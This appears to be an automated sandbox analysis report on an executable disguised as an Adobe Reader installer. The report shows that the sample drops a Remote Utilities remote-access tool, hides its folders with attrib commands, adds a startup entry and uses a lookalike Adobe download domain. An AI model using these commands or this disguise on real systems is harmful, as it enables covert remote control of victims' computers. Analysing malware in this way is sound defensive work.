Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Show sources

Source: unknown	Process created: C:\Users\user\Desktop\CDaNsQ7Rrd.exe 'C:\Users\user\Desktop\CDaNsQ7Rrd.exe' /i 'C:\Users\user\AppData\Roaming\Adobe\Adobe Reader 12.0.1\install\setup.msi' CHAINERUIPROCESSID='3256Chainer' EXECUTEACTION='INSTALL' SECONDSEQUENCE='1' CLIENTPROCESSID='3256' ADDLOCAL='MainFeature,RequiredApplication' ACTION='INSTALL' CLIENTUILEVEL='0' PRIMARYFOLDER='APPDIR' ROOTDRIVE='C:\' AI_PREREQFILES='C:\Users\user\AppData\Roaming\Adobe\Adobe Reader\prerequisites\RequiredApplication\setup.exe' AI_PREREQDIRS='C:\Users\user\AppData\Roaming\Adobe' EXE_CMD_LINE='/exenoupdates /exelang 0 /noprereqs ' AI_SETUPEXEPATH='C:\Users\user\Desktop\CDaNsQ7Rrd.exe' SETUPEXEDIR='C:\Users\user\Desktop\' TARGETDIR='C:\' APPDIR='C:\Program Files\Adobe\Adobe Reader\'
Source: unknown	Process created: C:\Users\user\Desktop\CDaNsQ7Rrd.exe 'C:\Users\user\Desktop\CDaNsQ7Rrd.exe' /i 'C:\Users\user\AppData\Roaming\Adobe\Adobe Reader 12.0.1\install\setup.msi' AI_RESUME=1 ADDLOCAL=MainFeature,RequiredApplication PRIMARYFOLDER='APPDIR' ROOTDRIVE='C:\' AI_PREREQFILES='C:\Users\user\AppData\Roaming\Adobe\Adobe Reader\prerequisites\RequiredApplication\setup.exe' AI_PREREQDIRS='C:\Users\user\AppData\Roaming\Adobe' AI_SETUPEXEPATH='C:\Users\user\Desktop\CDaNsQ7Rrd.exe' SETUPEXEDIR='C:\Users\user\Desktop\' TARGETDIR='C:\' APPDIR='C:\Program Files\Adobe\Adobe Reader\'
Source: unknown	Process created: C:\Users\user\Desktop\CDaNsQ7Rrd.exe 'C:\Users\user\Desktop\CDaNsQ7Rrd.exe' /i 'C:\Users\user\AppData\Roaming\Adobe\Adobe Reader 12.0.1\install\setup.msi' CHAINERUIPROCESSID='2404Chainer' EXECUTEACTION='INSTALL' SECONDSEQUENCE='1' CLIENTPROCESSID='2404' ADDLOCAL='MainFeature,RequiredApplication' ACTION='INSTALL' CLIENTUILEVEL='0' PRIMARYFOLDER='APPDIR' ROOTDRIVE='C:\' AI_PREREQFILES='C:\Users\user\AppData\Roaming\Adobe\Adobe Reader\prerequisites\RequiredApplication\setup.exe' AI_PREREQDIRS='C:\Users\user\AppData\Roaming\Adobe' AI_RESUME='1' TARGETDIR='C:\' AI_SETUPEXEPATH='C:\Users\user\Desktop\CDaNsQ7Rrd.exe' SETUPEXEDIR='C:\Users\user\Desktop\' APPDIR='C:\Program Files\Adobe\Adobe Reader\'
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	Process created: C:\Users\user\Desktop\CDaNsQ7Rrd.exe 'C:\Users\user\Desktop\CDaNsQ7Rrd.exe' /i 'C:\Users\user\AppData\Roaming\Adobe\Adobe Reader 12.0.1\install\setup.msi' CHAINERUIPROCESSID='3256Chainer' EXECUTEACTION='INSTALL' SECONDSEQUENCE='1' CLIENTPROCESSID='3256' ADDLOCAL='MainFeature,RequiredApplication' ACTION='INSTALL' CLIENTUILEVEL='0' PRIMARYFOLDER='APPDIR' ROOTDRIVE='C:\' AI_PREREQFILES='C:\Users\user\AppData\Roaming\Adobe\Adobe Reader\prerequisites\RequiredApplication\setup.exe' AI_PREREQDIRS='C:\Users\user\AppData\Roaming\Adobe' EXE_CMD_LINE='/exenoupdates /exelang 0 /noprereqs ' AI_SETUPEXEPATH='C:\Users\user\Desktop\CDaNsQ7Rrd.exe' SETUPEXEDIR='C:\Users\user\Desktop\' TARGETDIR='C:\' APPDIR='C:\Program Files\Adobe\Adobe Reader\'
Source: C:\Windows\System32\taskeng.exe	Process created: C:\Users\user\Desktop\CDaNsQ7Rrd.exe 'C:\Users\user\Desktop\CDaNsQ7Rrd.exe' /i 'C:\Users\user\AppData\Roaming\Adobe\Adobe Reader 12.0.1\install\setup.msi' AI_RESUME=1 ADDLOCAL=MainFeature,RequiredApplication PRIMARYFOLDER='APPDIR' ROOTDRIVE='C:\' AI_PREREQFILES='C:\Users\user\AppData\Roaming\Adobe\Adobe Reader\prerequisites\RequiredApplication\setup.exe' AI_PREREQDIRS='C:\Users\user\AppData\Roaming\Adobe' AI_SETUPEXEPATH='C:\Users\user\Desktop\CDaNsQ7Rrd.exe' SETUPEXEDIR='C:\Users\user\Desktop\' TARGETDIR='C:\' APPDIR='C:\Program Files\Adobe\Adobe Reader\'
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	Process created: C:\Users\user\Desktop\CDaNsQ7Rrd.exe 'C:\Users\user\Desktop\CDaNsQ7Rrd.exe' /i 'C:\Users\user\AppData\Roaming\Adobe\Adobe Reader 12.0.1\install\setup.msi' CHAINERUIPROCESSID='2404Chainer' EXECUTEACTION='INSTALL' SECONDSEQUENCE='1' CLIENTPROCESSID='2404' ADDLOCAL='MainFeature,RequiredApplication' ACTION='INSTALL' CLIENTUILEVEL='0' PRIMARYFOLDER='APPDIR' ROOTDRIVE='C:\' AI_PREREQFILES='C:\Users\user\AppData\Roaming\Adobe\Adobe Reader\prerequisites\RequiredApplication\setup.exe' AI_PREREQDIRS='C:\Users\user\AppData\Roaming\Adobe' AI_RESUME='1' TARGETDIR='C:\' AI_SETUPEXEPATH='C:\Users\user\Desktop\CDaNsQ7Rrd.exe' SETUPEXEDIR='C:\Users\user\Desktop\' APPDIR='C:\Program Files\Adobe\Adobe Reader\'

Language, Device and Operating System Detection:

Queries information about the installed CPU (vendor, model number etc)

Show sources

Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\installer.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\installer.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0

Queries the installation date of Windows

Show sources

Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\installer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate

Queries the volume information (name, serial number etc) of a device

Show sources

Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	Queries volume information: C:\Users\HERBBL~1\AppData\Local\Temp\AI_EXTUI_BIN_3256\background.jpg VolumeInformation
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	Queries volume information: C:\Users\HERBBL~1\AppData\Local\Temp\AI_EXTUI_BIN_3256\collecting.jpg VolumeInformation
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	Queries volume information: C:\Users\HERBBL~1\AppData\Local\Temp\AI_EXTUI_BIN_3256\background.jpg VolumeInformation
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	Queries volume information: C:\Users\HERBBL~1\AppData\Local\Temp\AI_EXTUI_BIN_3256\collecting.jpg VolumeInformation
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	Queries volume information: C:\Users\HERBBL~1\AppData\Local\Temp\AI_EXTUI_BIN_3256\background.jpg VolumeInformation
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	Queries volume information: C:\Users\HERBBL~1\AppData\Local\Temp\AI_EXTUI_BIN_3256\collecting.jpg VolumeInformation
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	Queries volume information: C:\Users\HERBBL~1\AppData\Local\Temp\AI_EXTUI_BIN_3256\background.jpg VolumeInformation
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	Queries volume information: C:\Users\HERBBL~1\AppData\Local\Temp\AI_EXTUI_BIN_3256\preparing.jpg VolumeInformation
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	Queries volume information: C:\Users\HERBBL~1\AppData\Local\Temp\AI_EXTUI_BIN_3256\installing.jpg VolumeInformation
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	Queries volume information: C:\Users\HERBBL~1\AppData\Local\Temp\AI_EXTUI_BIN_3256\background.jpg VolumeInformation
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	Queries volume information: C:\Users\HERBBL~1\AppData\Local\Temp\AI_EXTUI_BIN_3256\finalizing.jpg VolumeInformation
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	Queries volume information: C:\Users\HERBBL~1\AppData\Local\Temp\AI_EXTUI_BIN_2404\background.jpg VolumeInformation
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	Queries volume information: C:\Users\HERBBL~1\AppData\Local\Temp\AI_EXTUI_BIN_2404\collecting.jpg VolumeInformation
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	Queries volume information: C:\Users\HERBBL~1\AppData\Local\Temp\AI_EXTUI_BIN_2404\background.jpg VolumeInformation
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	Queries volume information: C:\Users\HERBBL~1\AppData\Local\Temp\AI_EXTUI_BIN_2404\preparing.jpg VolumeInformation
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	Queries volume information: C:\Users\HERBBL~1\AppData\Local\Temp\AI_EXTUI_BIN_2404\background.jpg VolumeInformation
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	Queries volume information: C:\Users\HERBBL~1\AppData\Local\Temp\AI_EXTUI_BIN_2404\installing.jpg VolumeInformation
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	Queries volume information: C:\Users\HERBBL~1\AppData\Local\Temp\AI_EXTUI_BIN_2404\background.jpg VolumeInformation
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	Queries volume information: C:\Users\HERBBL~1\AppData\Local\Temp\AI_EXTUI_BIN_2404\finalizing.jpg VolumeInformation
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\installer.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation

Queries the cryptographic machine GUID

Show sources

Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Remote Access Functionality:

Detected Remote Utilities RAT

Show sources

Source: unknown	Process created: C:\Windows\System32\attrib.exe attrib +s +h 'C:\Program Files (x86)\Remote Utilities - Host\.'
Source: unknown	Process created: C:\Windows\System32\attrib.exe attrib +s +h 'C:\Program Files (x86)\Remote Utilities - Host'
Source: unknown	Process created: C:\Windows\System32\attrib.exe attrib +s +h 'C:\Program Files\Remote Utilities - Host\.'
Source: unknown	Process created: C:\Windows\System32\attrib.exe attrib +s +h 'C:\Program Files\Remote Utilities - Host'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +s +h 'C:\Program Files (x86)\Remote Utilities - Host\.'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +s +h 'C:\Program Files\Remote Utilities - Host'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +s +h 'C:\Program Files (x86)\Remote Utilities - Host\.'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +s +h 'C:\Program Files\Remote Utilities - Host\.'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +s +h 'C:\Program Files (x86)\Remote Utilities - Host'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +s +h 'C:\Program Files\Remote Utilities - Host'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +s +h 'C:\Program Files (x86)\Remote Utilities - Host\.'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +s +h 'C:\Program Files (x86)\Remote Utilities - Host\.'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +s +h 'C:\Program Files (x86)\Remote Utilities - Host'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +s +h 'C:\Program Files\Remote Utilities - Host\.'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +s +h 'C:\Program Files\Remote Utilities - Host'
Source: C:\Windows\regedit.exe	Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Usoris\Remote Utilities Host\Host\Parameters Options

Behavior Graph

Simulations

Behavior and APIs

Time	Type	Description
10:31:45	API Interceptor	29x Sleep call for process: CDaNsQ7Rrd.exe modified
10:31:46	API Interceptor	1244x Sleep call for process: msiexec.exe modified
10:33:29	API Interceptor	21x Sleep call for process: taskeng.exe modified
10:33:34	API Interceptor	98x Sleep call for process: tasklist.exe modified
10:33:37	API Interceptor	24x Sleep call for process: find.exe modified
10:33:43	API Interceptor	1x Sleep call for process: 7zaa.exe modified
10:33:54	API Interceptor	1x Sleep call for process: installer.exe modified
10:33:55	API Interceptor	1016x Sleep call for process: taskkill.exe modified
10:33:56	API Interceptor	11x Sleep call for process: attrib.exe modified
10:34:00	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\armwake.lnk
10:34:01	API Interceptor	2x Sleep call for process: reg.exe modified
10:34:05	API Interceptor	1x Sleep call for process: regedit.exe modified
10:34:11	API Interceptor	104x Sleep call for process: fp.exe modified
10:34:16	API Interceptor	1093x Sleep call for process: explorer.exe modified
10:34:21	API Interceptor	4x Sleep call for process: dllhost.exe modified
10:34:24	API Interceptor	2x Sleep call for process: cscript.exe modified

Antivirus Detection

Initial Sample

Source	Detection	Scanner	Label	Link
CDaNsQ7Rrd.exe	0%	virustotal		Browse
CDaNsQ7Rrd.exe	0%	metadefender		Browse

Dropped Files

Source	Detection	Scanner	Link
C:\Users\HERBBL~1\AppData\Local\Temp\7ZipSfx.000\installer.exe	9%	virustotal	Browse
C:\Users\HERBBL~1\AppData\Local\Temp\7ZipSfx.000\installer.exe	6%	metadefender	Browse
C:\Users\HERBBL~1\AppData\Local\Temp\AI_EXTUI_BIN_2404\Prereq.dll	0%	virustotal	Browse

Unpacked PE Files

No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
adobemacromedia.com	3%	virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://adobemacromedia.com/setup.exe	3%	virustotal		Browse
http://adobemacromedia.com/setup.exe	0%	Avira URL Cloud	safe
http://www.advancedinstaller.com0	0%	Avira URL Cloud	safe

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Memory Dumps

No yara matches

Unpacked PEs

No yara matches

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
CLOUDFLARENET-CloudFlareIncUS	53Cheque10741.pdf.z.exe	454678e7cd95477d250dad1e987c1201f4e969d6bc20c3d987bcf75ddf1ff1ee	malicious	Browse	104.24.29.29
	MalhaFinaApp.exe	9b12c0617c26fb330406e3e6f382f58c5dbe2652f1c6e3c3464ecd6f8148de16	malicious	Browse	104.31.10.172
	e1e89c87-9f66-11e7-8388-80e65024849.exe	89dbde4056616e40aa07744ca89b611de5978c050bd17f58112801807a9d7ee2	malicious	Browse	104.16.91.188
	wccftech.com		malicious	Browse	104.20.11.37
	https://web.airdroid.com		malicious	Browse	104.16.20.35
	mzN17oSU6p.js	b2272e6d165a35ba1174c8b957c01844e6db0f366873c89fee2ff0f18d9c1af6	malicious	Browse	104.20.74.28
	mssecsvc.exe	dbf3890b782ac04136c3336814eef97e3c0f4133f9592e882c131c179161b27b	malicious	Browse	104.17.38.137
	uRYgdrK9N.exe	4f9246ba1efd8c4fe60da2ad48a50cc8473df8462596944cd1d326a0f30041c3	malicious	Browse	104.17.68.104
	67Order.exe	cebe3b664d64c97a7683a0fad06e6c45affe0deb8c15fb3e37552b97a6be5938	malicious	Browse	104.16.17.96
	5INV & P.L.exe	74ecf02ce3b8b94374b2f867b143abbb4439d19023105fbb2d3a4970269216c9	malicious	Browse	104.16.18.96
	http://ksksks.barsiksuperkot.org/?utm_medium=0b55674fb5dbcffa531ca5159eb4b7420bc4fb78&utm_campaign=177		malicious	Browse	104.31.94.164
	TEST1.doc	1c5b8339a0865d607c627ba1c29d0dd3968bce2bb2f85e2bc3e8302c08ea8635	malicious	Browse	104.20.209.21
	67quotatio.exe	236a137f3628a01f3b5d98a17062a1b014de25f4f7c4a5acd7c8b4c8daa39d44	malicious	Browse	104.31.92.140
	41proforma invoice.exe	82f08793b891d357626e5f68a232b36c6b02e6b2dec6062143cfc249b2d34566	malicious	Browse	104.16.17.96
	http://imprismail.com/affiliate/referral.asp?site=rea&url=pop/en/ukc/1&aff_id=5843_27027_19234_535127_1_357_		malicious	Browse	104.20.63.152
	d5#U309a.doc	7bb52f08b24ad4122cdbd6d18869278b92be14ca07298fd8311d7c2e6b89f968	malicious	Browse	104.20.209.21
	30PO-1639.exe	1b92ac282dfa32fe1286f60fec9855cdfa8b702ff256253f3d17521ffea9ae5e	malicious	Browse	104.17.68.104
	11Order # 000001122.exe	e37cdbfa767e77da871daf75556887f08969fdc1bed27d716d72ca6803d04519	malicious	Browse	104.16.17.96
	43wallet.aes.js.js	bf573b716bc0afd48c474c7bc88b817beced81277e37796fde009f6d0b52df6f	malicious	Browse	104.27.160.33
	https://indimetalsac.com/aah/scan.html		malicious	Browse	104.27.138.193
TIMEWEB-ASRU	Informationen940934865.doc	aa6b8004d075bd0180a4a17ba1815658c9162df7cd313ba6246b278f812142f8	malicious	Browse	92.53.96.13
	2018-01-10_12-13-23.exe	cb79748ee67032d541a333e053cdf8dd2a3f53bc47855d35381814d75e155050	malicious	Browse	92.53.105.14
	2017-12-28-Rig-EK-landing-page.html	1b2017ee03927583f72cde2c06da3886f04dd1f76182029194b2105379e78a8c	malicious	Browse	176.57.214.103
	Invoices attached.doc	97d3814120b3441950ab9b0ca6676420cf968d90900a037644d5cce08c14816f	malicious	Browse	92.53.96.178
	Document-needed.doc	f877a8406d60ae5c3fce22da9512425b089dbc8da56016fbed2f5985b49a5ae8	malicious	Browse	92.53.96.178
	#U437#U430 #U430#U43f#U440#U435#U43b#U44c.js	b61f1c4f35fe01ff926d8a7d8b91ed95d83ce565a1db5838f38f074f3a7aa700	malicious	Browse	92.53.96.18
	12 #U430#U43f#U440 2018.js	dc383b9ba9083572d2cba7885048f82df700e61f65680b358aa7d3518a3532ca	malicious	Browse	92.53.96.18
	12 #U430#U43f#U440 2018.js	dc383b9ba9083572d2cba7885048f82df700e61f65680b358aa7d3518a3532ca	malicious	Browse	92.53.96.18
	http://www.mixturro.com/LLC/Invoice/		malicious	Browse	92.53.96.107
	Invoices attached.doc	97d3814120b3441950ab9b0ca6676420cf968d90900a037644d5cce08c14816f	malicious	Browse	92.53.96.178
	Document-needed.doc	f877a8406d60ae5c3fce22da9512425b089dbc8da56016fbed2f5985b49a5ae8	malicious	Browse	92.53.96.178
	Hancitor25.04.doc	42c23d01becdf472da20e1e2f20316a56fd549a36cec0ac9967f730e2fded31b	malicious	Browse	92.53.107.93
	2018_4_26_april.js	9a33838947857a3d9717a55b81540b21dd53a3b1d626edac29d922262b31e557	malicious	Browse	92.53.118.146
	2018_4_26_april.js	9a33838947857a3d9717a55b81540b21dd53a3b1d626edac29d922262b31e557	malicious	Browse	92.53.118.146
	45CanadaPost.js	86aad7dfdf743575bb58c78dfe529447305e97b141d7f680384513f62661644d	malicious	Browse	92.53.118.144
	53Purchase Order.exe	92ebf38bc6442dc52502d891b81ca1d085425b6f38343ce9efc9887d3cca96df	malicious	Browse	92.53.96.139
	30Label_000115602.doc.js	b18422d3d33fce0a3d32f01e6bae2c9fde695eb00bcecc7c570429eae7e2fe16	malicious	Browse	92.53.96.94
	HHemAoXDg.exe	5c32e0d2a69fd77e85f2eecaabeb677b6f816de0d82bf7c29c9d124a818f424f	malicious	Browse	188.225.46.219
	Emotet.doc	f04475ef220a30546e1f7f5628c3059a3a0fbcc968e5992f79a8edb12d9c7096	malicious	Browse	92.53.118.146
	#U437#U430 #U430#U43f#U440#U435#U43b#U44c.js	b61f1c4f35fe01ff926d8a7d8b91ed95d83ce565a1db5838f38f074f3a7aa700	malicious	Browse	92.53.96.18

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\inst_fold\7za.dll	tes2.exe	d5d121c266920034026c83be987253b6c8a47b6d7a35147fe6c9f7b9e6c25e06	malicious	Browse
C:\inst_fold\7zaa.exe	tes2.exe	d5d121c266920034026c83be987253b6c8a47b6d7a35147fe6c9f7b9e6c25e06	malicious	Browse
C:\inst_fold\7zaa.exe	runme.exe	5cb1c8a2c2e0f782e2d6c61db8bff3febfd7d271bc3e33864c719896d70ac7e6	malicious	Browse

Screenshots

Startup

System is w7

CDaNsQ7Rrd.exe (PID: 3256 cmdline: 'C:\Users\user\Desktop\CDaNsQ7Rrd.exe' MD5: EDA8E4F2DF81E0BA5B88D73DE9779205)

CDaNsQ7Rrd.exe (PID: 3552 cmdline: 'C:\Users\user\Desktop\CDaNsQ7Rrd.exe' /i 'C:\Users\user\AppData\Roaming\Adobe\Adobe Reader 12.0.1\install\setup.msi' CHAINERUIPROCESSID='3256Chainer' EXECUTEACTION='INSTALL' SECONDSEQUENCE='1' CLIENTPROCESSID='3256' ADDLOCAL='MainFeature,RequiredApplication' ACTION='INSTALL' CLIENTUILEVEL='0' PRIMARYFOLDER='APPDIR' ROOTDRIVE='C:\' AI_PREREQFILES='C:\Users\user\AppData\Roaming\Adobe\Adobe Reader\prerequisites\RequiredApplication\setup.exe' AI_PREREQDIRS='C:\Users\user\AppData\Roaming\Adobe' EXE_CMD_LINE='/exenoupdates /exelang 0 /noprereqs ' AI_SETUPEXEPATH='C:\Users\user\Desktop\CDaNsQ7Rrd.exe' SETUPEXEDIR='C:\Users\user\Desktop\' TARGETDIR='C:\' APPDIR='C:\Program Files\Adobe\Adobe Reader\' MD5: EDA8E4F2DF81E0BA5B88D73DE9779205)

cmd.exe (PID: 3248 cmdline: C:\Windows\system32\cmd.exe /c ''C:\Users\HERBBL~1\AppData\Local\Temp\EXE21F6.tmp.bat' ' MD5: AD7B9C14083B52BC532FBA5948342B98)

attrib.exe (PID: 3320 cmdline: ATTRIB -r '\\?\C:\Users\HERBBL~1\AppData\Roaming\Adobe\ADOBER~1.1\install\setup.msi' MD5: 459A5755AFBB1CB3E67CA4C1296599E3)

attrib.exe (PID: 524 cmdline: ATTRIB -r 'C:\Users\HERBBL~1\AppData\Local\Temp\EXE21F6.tmp.bat' MD5: 459A5755AFBB1CB3E67CA4C1296599E3)

cmd.exe (PID: 3216 cmdline: C:\Windows\system32\cmd.exe /S /D /c' del 'C:\Users\HERBBL~1\AppData\Local\Temp\EXE21F6.tmp.bat' ' MD5: AD7B9C14083B52BC532FBA5948342B98)

